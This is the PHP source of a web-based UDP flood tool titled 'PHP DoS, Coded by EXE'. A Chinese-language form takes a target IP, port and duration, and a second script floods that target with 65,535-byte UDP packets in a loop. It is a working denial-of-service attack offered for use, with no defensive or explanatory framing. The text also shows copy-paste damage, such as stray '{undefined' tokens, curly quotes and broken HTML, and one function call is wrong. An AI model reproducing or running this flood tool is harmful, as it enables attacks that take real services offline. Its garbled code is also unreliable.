index.php
$ip = $_SERVER[‘REMOTE_ADDR’];
?>
-//W3C//DTD HTML 4.01 Transitional//EN” “http://www.w3.org/TR/html4/loose.dtd”>
PHP DoS, Coded by EXE
body {undefined
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
line-height: normal;
color: #FFFFFF;
background-color: #000000;
}
–>
你的 IP: <?php echo $ip; ?> (请勿以你的ip作为攻击目标)
IP:
Time:
Port:
发起DOS攻击后,请等待浏览器加载
function.php
$packets = 0;
$ip = $_POST[‘ip’];
$rand = $_POST[‘port’];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_POST[‘time’];
$time = time();
print “Flooded: $ip on port $rand
”;
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){undefined
$out .= “X”;
}
while(1){undefined
$packets++;
if(time() > $max_time){undefined
break;
}
$fp = fsockopen(“udp://$ip”, $rand, $errno, $errstr, 5);
if($fp){undefined
fwrite($fp, $out);
fclose($fp);
}
}
echo “Packet complete at “.time(‘h:i:s’).” with $packets (” . round(($packets*65)/1024, 2) . ” mB) packets averaging “. round($packets/$exec_time, 2) . ” packets/s \n”;
?>